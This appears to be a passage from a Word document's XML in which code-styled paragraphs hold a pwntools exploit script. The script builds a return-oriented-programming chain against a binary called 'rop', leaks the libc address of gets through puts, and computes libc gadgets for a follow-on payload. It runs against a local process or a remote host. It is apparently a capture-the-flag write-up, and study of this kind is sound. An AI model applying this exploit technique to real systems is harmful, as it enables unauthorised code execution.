            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="4903EE19" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D20BA0" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRDI = p64(0x004006b3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3314CB19" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>retGdgt = p64(0x004004a9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC04CFB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F561D4A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pltPuts = p64(binary.plt.puts)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address to call</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AE6D23" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>gotGets = p64(binary.got.gets)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F9D959A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B81367F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>mainAddr = p64(0x00400621)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address of first line in main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0714823A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38D4A79D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="512F02E2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138E7192" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld += retGdgt + popRDI + gotGets + pltPuts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA79CDE" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld += mainAddr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B39DEA4" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return pld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="261F2C4C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14F316AF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CB9FE75" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def mainline(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1663A1E7" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>i = 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0746D4C4" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>while i &lt; 3:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="435D1F5F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668953E1" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(mainLinePld())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D63CCCF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B4F485" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addr = p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11156B8F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DCC0D3C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak = u64(addr.ljust(8, b'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1824B128" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("gets leak - " + hex(leak))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52AD16D5" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>i+=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5551D846" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FE2C8AD" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A39671E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0735D4AD" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def localMainline():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="372C9E2E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = process("./rop")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45BD206E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>context.log_level = 'debug'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0391EE03" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>mainline(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10649899" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E3EDF33" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D059B84" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def remoteMainline():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B2BF7AF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = remote(HOST, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C9E186" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>context.log_level = 'debug'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BDD895A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>mainline(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CEB19F5" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="124FCB29" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def pwnPLD_libc6(libcBase):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A31A0D0" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>binary = context.binary = ELF('./rop', checksec=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF318E3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="150EA7B1" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Gadgets in Binary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E43E214" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D44FC9F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRDI = p64(0x004006b3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A9C3435" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000004006b1 : pop rsi ; pop r15 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="758BA3ED" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRSI = p64(0x004006b1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="091CB0AA" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t># 0x00000000004004a9 : ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB21D16" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>retGdgt = p64(0x004004a9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="481298BA" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C79F935" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E5A0D5E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Gadgets in Library</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FBFA1F2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000000fd6bd : pop rdx ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15B48FBE" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>g = libcBase + 0x00fd6bd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AFB22CC" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("popRDX - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F72BD7C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRDX = p64(g)</w:t>
            </w:r>
          </w:p>
